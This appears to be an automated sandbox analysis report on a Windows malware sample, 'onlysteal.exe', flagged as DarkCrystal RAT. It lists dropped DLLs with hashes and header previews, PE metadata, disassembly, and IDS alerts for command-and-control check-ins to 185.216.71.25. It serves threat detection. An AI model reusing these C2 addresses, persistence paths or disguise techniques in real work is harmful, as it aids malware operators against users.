                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\FPzqkKvM.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\RpedHXOW.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\kzbsFheO.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\plugneHL.log

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\vmGXvtnF.log

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\wYGfctxY.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\zVMHRGyj.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    \Device\Null

                                    Download File
                                    Process:C:\Windows\System32\w32tm.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):151
                                    Entropy (8bit):4.757812247066604
                                    Encrypted:false
                                    SSDEEP:3:VLV993J+miJWEoJ8FXrX9Qvt8VLUVJ8XKvpKM8Q0HKvj:Vx993DEUQtdVLUVJgLZs
                                    MD5:303E501CC86F7F9A740D6BDECAA03737
                                    SHA1:351C09FA814208751E530BD008811025B8999136
                                    SHA-256:E9C31C3A5206187AFBC0960D809A57BEB8FC6C2BBA4FA70944079E88BB973D57
                                    SHA-512:9FBD6230BE512FE96EF73684D16309BFC146A46771B86C9CDB5B8F4826B78E5BF38A31D1CC883C0D771139A3AE9445F91EABF26C1CCB302AFFB3FF98C58DC20C
                                    Malicious:false
                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/01/2025 05:10:10..05:10:10, error: 0x80072746.05:10:15, error: 0x80072746.

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.114565984261988
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:onlysteal.exe
                                    File size:1'011'382 bytes
                                    MD5:8f81ac89b9f6dbccf07a86af59faa6ba
                                    SHA1:0d97a27bacaae103f2f15637f623d3d13a568d91
                                    SHA256:766b497466955f86e0d049c25aa6f99880d230acbb8d1141408fe0e8169fb46a
                                    SHA512:452c04ec647dd84123ffb84f1ff37aef81057edf0c1a069113d0b1d89f2462c373301aa84355d0fafd8bb6c4b3d4b6bf580952f29189157edaea376711be16ea
                                    SSDEEP:24576:2TbBv5rUyXVUxJMVI3SyKnUh9E1bm67+f:IBJcJMrEh9mbc
                                    TLSH:9E2518107AEA0136F1B6ABB155E1695E86BDF9F3B7168FCE304082CA87167C0CD61736
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                    File Icon

                                    Icon Hash:1515d4d4442f2d2d

                                    Static PE Info

                                    General

                                    Entrypoint:0x41f530
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                    Entrypoint Preview

                                    Instruction
                                    call 00007FA8A07F322Bh
                                    jmp 00007FA8A07F2B3Dh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    push dword ptr [ebp+08h]
                                    mov esi, ecx
                                    call 00007FA8A07E5987h
                                    mov dword ptr [esi], 004356D0h
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    and dword ptr [ecx+04h], 00000000h
                                    mov eax, ecx
                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 004356D8h
                                    mov dword ptr [ecx], 004356D0h
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    mov esi, ecx
                                    lea eax, dword ptr [esi+04h]
                                    mov dword ptr [esi], 004356B8h
                                    push eax
                                    call 00007FA8A07F5FCFh
                                    test byte ptr [ebp+08h], 00000001h
                                    pop ecx
                                    je 00007FA8A07F2CCCh
                                    push 0000000Ch
                                    push esi
                                    call 00007FA8A07F2289h
                                    pop ecx
                                    pop ecx
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007FA8A07E5902h
                                    push 0043BEF0h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007FA8A07F5A89h
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007FA8A07F2C48h
                                    push 0043C0F4h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007FA8A07F5A6Ch
                                    int3
                                    jmp 00007FA8A07F7507h
                                    int3
                                    int3
                                    int3
                                    int3
                                    push 00422900h
                                    push dword ptr fs:[00000000h]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                    PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                    RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                    RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                    RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                    RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                    RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                    RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                    RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                    RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                    RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                    RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                    RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                    RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                    RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                    RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                    RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                    RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                    RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                    RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                    RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                    RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                    RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                    RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                    RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                    RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                    RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                    Imports

                                    DLLImport
                                    KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                    OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                    gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-03T09:10:33.122779+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.649746185.216.71.2580TCP
                                    2025-01-03T09:11:00.557774+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.649377185.216.71.2580TCP
                                    2025-01-03T09:11:59.621339+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.649431185.216.71.2580TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 3, 2025 09:10:11.716836929 CET4974680192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:11.721666098 CET8049746185.216.71.25192.168.2.6
                                    Jan 3, 2025 09:10:11.721735001 CET4974680192.168.2.6185.216.71.25
                                    Jan 3, 2025 09:10:11.722014904 CET4974680192.168.2.6185.216.71.25
